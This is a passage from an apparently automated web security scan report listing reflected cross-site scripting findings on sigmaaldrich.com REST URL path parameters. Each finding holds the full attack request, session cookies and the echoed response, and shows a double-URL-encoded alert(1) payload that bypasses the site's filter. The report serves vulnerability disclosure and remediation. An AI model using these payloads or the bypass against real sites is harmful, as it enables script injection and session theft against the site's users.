WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:44 GMT
Content-Length: 29006
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-support/customer-service/services/facility-operationsbe459";alert(1)//e9d7d10188d/chemical-handling","E404") ;
   </script>
...[SNIP]...

1.184. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/facility-operations/chemical-handling [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/facility-operations/chemical-handling

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b9696%2522%253balert%25281%2529%252f%252f6c5c4df6af0 was submitted in the REST URL parameter 7. This input was echoed as b9696";alert(1)//6c5c4df6af0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 7 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-support/customer-service/services/facility-operations/chemical-handlingb9696%2522%253balert%25281%2529%252f%252f6c5c4df6af0 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:46 GMT
Content-Length: 29006
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-support/customer-service/services/facility-operations/chemical-handlingb9696";alert(1)//6c5c4df6af0","E404") ;
   </script>
...[SNIP]...

1.185. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/mfg-production [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/mfg-production

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d4b74%2522%253balert%25281%2529%252f%252f20aa999b365 was submitted in the REST URL parameter 1. This input was echoed as d4b74";alert(1)//20aa999b365 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /contentd4b74%2522%253balert%25281%2529%252f%252f20aa999b365/sigma-aldrich/customer-support/customer-service/services/mfg-production HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:30 GMT
Content-Length: 28983
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/contentd4b74";alert(1)//20aa999b365/sigma-aldrich/customer-support/customer-service/services/mfg-production","E404") ;
   </script>
...[SNIP]...

1.186. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/mfg-production [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/mfg-production

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f2c8e%2522%253balert%25281%2529%252f%252f6eab9ea52b4 was submitted in the REST URL parameter 2. This input was echoed as f2c8e";alert(1)//6eab9ea52b4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrichf2c8e%2522%253balert%25281%2529%252f%252f6eab9ea52b4/customer-support/customer-service/services/mfg-production HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:32 GMT
Content-Length: 28983
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrichf2c8e";alert(1)//6eab9ea52b4/customer-support/customer-service/services/mfg-production","E404") ;
   </script>
...[SNIP]...

1.187. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/mfg-production [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/mfg-production

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77f4b%2522%253balert%25281%2529%252f%252f01ff7cdb67d was submitted in the REST URL parameter 3. This input was echoed as 77f4b";alert(1)//01ff7cdb67d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-support77f4b%2522%253balert%25281%2529%252f%252f01ff7cdb67d/customer-service/services/mfg-production HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:34 GMT
Content-Length: 28983
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-support77f4b";alert(1)//01ff7cdb67d/customer-service/services/mfg-production","E404") ;
   </script>
...[SNIP]...

1.188. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/mfg-production [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/mfg-production

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c39a6%2522%253balert%25281%2529%252f%252fe5b0302a57f was submitted in the REST URL parameter 4. This input was echoed as c39a6";alert(1)//e5b0302a57f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-support/customer-servicec39a6%2522%253balert%25281%2529%252f%252fe5b0302a57f/services/mfg-production HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; 